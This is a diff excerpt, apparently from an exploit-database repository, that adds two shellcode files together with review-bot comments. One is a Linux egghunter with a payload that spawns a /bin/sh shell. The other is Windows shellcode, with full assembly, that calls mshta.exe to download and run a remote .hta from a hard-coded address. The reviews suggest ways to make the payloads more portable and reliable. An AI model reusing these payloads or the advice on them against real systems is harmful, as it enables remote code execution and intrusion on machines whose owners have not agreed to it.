+unsigned char egghunter[] = "\xfc\x31\xc9\xf7\xe1\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
+
+unsigned char shellcode[] = "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc9\xf7\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xcd\x80";
+
+void main()
+{
+ printf("Egghunter Length: %d\n", strlen(egghunter));
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int (*ret)() = (int(*)())egghunter;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/48718.c b/shellcodes/windows_x86/48718.c
new file mode 100644
index 000000000..904b38aaf
--- /dev/null
+++ b/shellcodes/windows_x86/48718.c
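Review bot: The doubled egg `"\x90\x50\x90\x50\x90\x50\x90\x50"` at the head of `shellcode` is there because the hunter itself carries the egg dword as an immediate (`\xb8\x90\x50\x90\x50`), so a single-dword match would find the hunter and `jmp edi` into its own code; the two consecutive `scasd` checks are what rule that out, and the comment on the second `scasd` should say so rather than repeat 'Check if [EDI] == EAX'. `ebx`, the signum argument to `sigaction`, is never set, so the probe depends on the kernel rejecting a bad `act` pointer with EFAULT before it validates the signal number (the property skape's paper relies on), and `cmp al, 0xf2` only compares the low byte of the return, which is enough for `-EFAULT` but deserves a comment. In the harness, `void main()` is non-standard and `%d` with `strlen` should be `%zu`; `int main(void)` with `return 0;` is the portable form. The compile line names `sigaction_egghunter.c` while the file is `48703.c`.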
@@ -0,0 +1,69 @@
+# Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
+# Shellcode Author: Siddharth Sharma
+# Shellcode Length: ~100 bytes
+# Tested on: WIN7x86
+# Date: 2020-06-16
+
+/*
+
+#Description
+# Simply, instead of using mshta.exe to download file as:
+mshta.exe http:// : / ,
+# We could use below shellcode that does the same.
+
+
+
+=============================
+xor eax, eax ;clear eax,get msvcrt.dll
+mov ax, 0x7472 ;"tr\0\0"
+push eax
+push dword 0x6376736d ;cvsm
+push esp
+
+
+mov ebx,0x77e3395c ;call LoadLibraryA
+call ebx
+mov ebp,eax ;msvcrt.dll is saved in ebp
+
+
+;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
+xor eax,eax
+PUSH eax
+PUSH 0x6174682e ;".hta"
+PUSH 0x4f526157 ;"WaRO"
+PUSH 0x4b4d392f ;"/9MK"
+PUSH 0x38303830 ;"8080"
+PUSH 0x3a323931 ;"192:"
+PUSH 0x2e33342e ;".43."
+PUSH 0x3836312e ;".168"
+PUSH 0x3239312f ;"/192"
+PUSH 0x2f3a7074 ;"tp:/"
+PUSH 0x74682065 ;"e ht"
+PUSH 0x78652e61 ;"a.ex"
+PUSH 0x7468736d ;"msht"
+
+
+
+MOV EDI,ESP ;adding a pointer to the stack
+PUSH EDI
+
+
+Mov eax,0x6ffab16f ;call System
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x77e3214f ;call ExitProcess
+call eax
+=====================================
+*/
+
+
+char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";
+
+int main(int argc, char **argv)
+{
+ int(*func)();
+ func = (int(*)()) code;
+ (int)(*func)();
+}
\ No newline at end of file
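Review bot: Every API is reached through a hard-coded absolute address — `mov ebx,0x77e3395c` (LoadLibraryA), `mov eax,0x6ffab16f` (system), `mov eax,0x77e3214f` (ExitProcess) — so the bytes are tied to the exact Windows 7 x86 image they were taken from, and with ASLR relocating those DLLs they will most likely crash on any other build or after a reboot; the header should state "addresses valid only for the tested image" or the code should resolve them via a PEB/export-table walk. The `LoadLibraryA("msvcrt")` handle saved by `mov ebp,eax` is never read again, because `system` is called by absolute address rather than through `ebp` plus an offset, so the load and its unchecked return are dead weight unless the resolution is fixed. The URL `http://192.168.43.192:8080/9MKWaRO.hta` is baked into the twelve `PUSH` immediates, so reuse means rebuilding that sequence and re-measuring the "~100 bytes" length, and the description line `mshta.exe http:// : / ,` has lost its placeholders and should read something like `mshta.exe http://<host>:<port>/<file>.hta`. `system` is cdecl and the pushed `EDI` is never popped, which is harmless only because `ExitProcess` follows immediately.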